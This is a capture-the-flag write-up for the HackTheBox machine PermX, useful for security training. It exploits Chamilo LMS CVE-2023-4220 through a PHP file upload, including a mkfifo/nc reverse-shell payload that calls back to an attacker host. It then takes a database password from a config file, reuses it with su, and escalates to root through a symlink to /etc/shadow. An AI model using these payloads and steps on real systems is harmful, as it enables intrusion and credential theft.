Hackthebox: PermX

Foued SAIDI Lv4
  2024-11-01 15:52:28 2024-11-01 15:52:28 Created   2024-11-01 17:30:27 2024-11-01 17:30:27 Updated    

Overview

PermX is an easy-difficulty machine from HackTheBox. It initially deals with some subdomain enumeration to discover a Chamilo LMS vulnerable to CVE-2023-4220 -an unauthenticated RCE- granting us system access. Later with some data exfil to get some database credentials, we’ll abuse a bash script with sudo privileges that’ll allow us to symlink the root directory, modifying the /etc/shadow file and gaining root privileges.

PermX-info-card
PermX-info-card

Reconnaissance

We’ll be first doing enumeration for open ports using nmap:

Nmap

1
2
3
4
5
6
7
8
9
10
11
PS C:\Users\0xkujen> nmap -A -Pn 10.129.117.84 
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-01 15:58 W. Central Africa Standard Time
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://permx.htb
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that we have our typical ssh port open alondside a web application deployed on port 80 redirecting us to http://permx.htb, so let’s go ahead and add an entry for permx.htb to our /etc/hosts file.

Subdomain Enumeration - Ffuf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
PS C:\Users\0xkujen\Desktop\Tools\ffuf_2.0.0_windows_amd64> .\ffuf.exe -w ..\SecLists-master\SecLists-master/Discovery\DNS\bitquark-subdomains-top100000.txt -H "Host: FUZZ.permx.htb" -u "http://10.129.117.84" -fw 18

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.0.0
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.117.84
 :: Wordlist         : FUZZ: C:\Users\0xkujen\Desktop\Tools\SecLists-master\SecLists-master\Discovery\DNS\bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.permx.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response words: 18
________________________________________________

[Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 195ms]:01] :: Errors: 0 ::
    * FUZZ: www

[Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 3559ms]00:34] :: Errors: 0 ::
    * FUZZ: lms

Trying to enumerate subdomains with ffuf, we get www and lms. Let’s add these couple to our ``/etc/hosts` file and check what we have.

Web Application - http://lms.permx.htb

Navigation to our web application, we are prompted with a Chamilo login interface:

Chamilo LMS
Chamilo LMS

CVE-2023-4220

Taking a look at http://lms.permx.htb/README.md (after some bruteforcing), we can see that the Chamilo version we’re dealing with is 1.11.xx:

Chamilo LMS
Chamilo LMS

Looking out for some epxloits targeting this version, I stumbled upon this insightful blog talking about CVE-2023-4220 where we can exploit an Unauthenticated Big Upload File Remote Code Execution to land control over the system. So let’s try it out:
1- We first have to ensure that http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/ exists, and it does.
2- Create our simple php command such as a casual <?php system('id'); ?> 3- Run this command curl -F ‘bigUploadFile=@rce.php’ ‘http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'`` to upload our malicious command file to the LMS platform.
4- Run this command curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/rce.php' to execute our malicious command.
Lessgo:

1
2
3
4
5
kujen@kujen:~$ echo "<?php system('id');" > rce.php
kujen@kujen:~$ curl -F '[email protected]' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.
kujen@kujen:~$ curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/rce.php'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

And it has been successful!
Let’s now get a shell on the system:

1
2
3
4
5
kujen@kujen:~$ cat rce.php
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.x.x 9001 >/tmp/f"); ?>
kujen@kujen:~$ curl -F '[email protected]' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.
kujen@kujen:~$ curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/rce.php'

And we are in:

1
2
3
4
5
6
7
PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.117.84] 56424
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Let’s no stablize our shell: python3 -c 'import pty;pty.spawn("/bin/bash")'
And let’s take a look for some database credentials, we might find something juicy. Running this command www-data@permx:/var/www/chamilo$ find ./ -name config* 2> /dev/null, we stumble upon ./app/config/configuration.php file. So let’s check it out:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
www-data@permx:/var/www/chamilo$ cat ./app/config/configuration.php | grep -i password
<t ./app/config/configuration.php | grep -i password
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Security word for password recovery
$_configuration['password_encryption'] = 'bcrypt';
// Set to true to allow automated password conversion after login if
// password_encryption has changed since last login. See GH#4063 for details.
//$_configuration['password_conversion'] = false;
// Customize password generation and verification
/*$_configuration['password_requirements'] = [
    'force_different_password' => false,
// Send two emails when creating a user. One with the username other with the password.
// Validate user login via a webservice, Chamilo will send a "login" and "password" parameters
        'wget_password' => '',
// Use this link as the "Forgot password?" link instead of the default. This setting should be transformed into a hook for plugins at a later time
// Show/Hide password field in user profile. Adds a customizable link depending on the user status.
$_configuration['auth_password_links'] = [
                'show_password_field' => false,
                'show_password_field' => true,
// Ask user to renew password at first login.
// Requires a user checkbox extra field called "ask_new_password".
//$_configuration['force_renew_password_at_first_login'] = true;
// Add the "remember password" link to the "subscription to session" confirmation email
//$_configuration['email_template_subscription_to_session_confirmation_lost_password'] = false;
www-data@permx:/var/www/chamilo$

And we do have a password: “03F6lY3uXAP2bkW8”

Let’s try it out on our mtz user that we can find under /home:

1
2
3
4
5
6
7
8
9
10
www-data@permx:/home$ su mtz
su mtz
Password: 03F6lY3uXAP2bkW8

mtz@permx:/home$ cd mtz
cd mtz
mtz@permx:~$ cat user.txt
cat user.txt
ed62845cbeaa21******************
mtz@permx:~$

And we are in and have our user.txt flag!

Privilege Escalation to root -

Checking what we can run as sudo with mtz:

1
2
3
4
5
6
7
8
9
10
mtz@permx:~$ sudo -l
sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh
mtz@permx:~$

We can see that we can run a /opt/acl.sh script. Checking its’ contents:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
mtz@permx:~$ cat /opt/acl.sh
cat /opt/acl.sh
#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
mtz@permx:~$

Analyzing the script, it basically manages filespermissions using ACLs (access control lists) in a controlled way. It will “securely” assign files permissions to specific users on files located withing /home/mtz folder.
What we can do is symlink the /etc/shadow file to our directory, modify the root password hash and then access it. Lessdoit:

1
2
3
4
5
6
7
8
9
mtz@permx:~$ cd /home/mtz
mtz@permx:~$ ln -s / root
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow
mtz@permx:~$ nano /etc/shadow
mtz@permx:~$ su root
Password:
root@permx:/home/mtz# cat /root/root.txt
5d0e617b7c5ac2******************
root@permx:/home/mtz#

And that was it for this box! Hope you enjoyed it <3
-0xkujen

  • Title: Hackthebox: PermX
  • Author: Foued SAIDI
  • Created at : 2024-11-01 15:52:28
  • Updated at : 2024-11-01 17:30:27
  • Link: https://kujen5.github.io/2024/11/01/Hackthebox-PermX/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
Hackthebox: PermX
  1. Overview
  2. Reconnaissance
  3. Web Application - http://lms.permx.htb
  4. Privilege Escalation to root -